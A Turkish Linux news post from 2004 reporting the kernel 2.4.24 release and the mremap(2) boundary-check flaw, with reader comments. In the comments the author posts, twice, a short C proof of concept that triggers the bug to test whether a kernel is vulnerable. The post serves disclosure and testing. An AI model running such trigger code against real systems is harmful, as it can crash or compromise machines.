Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Jabber Sunucusu ve Kullanımı
caglar_onur
31 Ekim 2004, 1 dakika okuma süresi

Linux Kullanıcıları Derneği, 3 Kasım 2004 Çarşamba günü saat 18:30'da Ankara Üniversitesi Fen Fakültesi Kırmızı Salon'da bir seminer düzenliyor. Seminerde Jabber ve XML protokollerinin yanı sıra örnek Jabber sunucu ve istemci yazılımlarından bazıları örneklerle incelenecek ve web/veritabanı uygulamalarına Jabber protokolü ile entegrasyon sağlayan J-Spy, J-Bot, J-Admin ve J-Guard adlı GPL yazılımları tanıtılacaktır.

http://seminer.linux.org.tr

SuSE 9 İncelemesi ve Kurulum Rehberi
ghanthar
9 Aralık 2003, 1 dakika okuma süresi

SuSE ana bayisi Linux34 ün SuSE.web.tr sitesinde SuSE 9 incelemesi yayımlandı. Ekran görüntüleri ve adım adım kurulum anlatımı ile oldukça detaylı olan bu incelemeye ulaşmak için tıklayın.

Linux üzerinde Dreamweaver: Rüya değil...
conan
5 Aralık 2001, 1 dakika okuma süresi

Shibumi'nin son oylamada yaptığı bu yorumundan sonra Dreamweaver`ı (v 4) Linux altında çalıştırmak için yaptığım kısa uğraş sonucu elde ettiklerimi yazayım. Belki birilerine yardımı olur.

HP: GNU/Linux olduğundan düşük gösteriliyor
cihatix
9 Mart 2005, 1 dakika okuma süresi

Açık kaynağı destekleyen şirketlerden HP’nin üst düzey bir yöneticisi, istatistik şirketlerinin geri kalmış ölçüm yöntemleri nedeniyle GNU/Linux’un yaygınlığını olduğundan aşağıda gösterdiklerini öne sürdü.

Linus´dan SCO´ya cevap!
sundance
30 Ocak 2004, 9 dakika okuma süresi

SCO´nun iddiaları üzerine son yapılan röportajında Linus Tornvalds, iddiaları yanıtlarken, durumun çok güzel bir resmini çiziyor. Her zamanki sade akılcı üslubu ile duruma açıklık getiriyor.

Fakat bence daha bile önemlisi, email ya da ICQ başına geçtiğinde canavar dönüşen birçok Internet kullanıcısına problemlerin bu şekilde çözülmediğini anlatan bilgece bir yol göstermesi.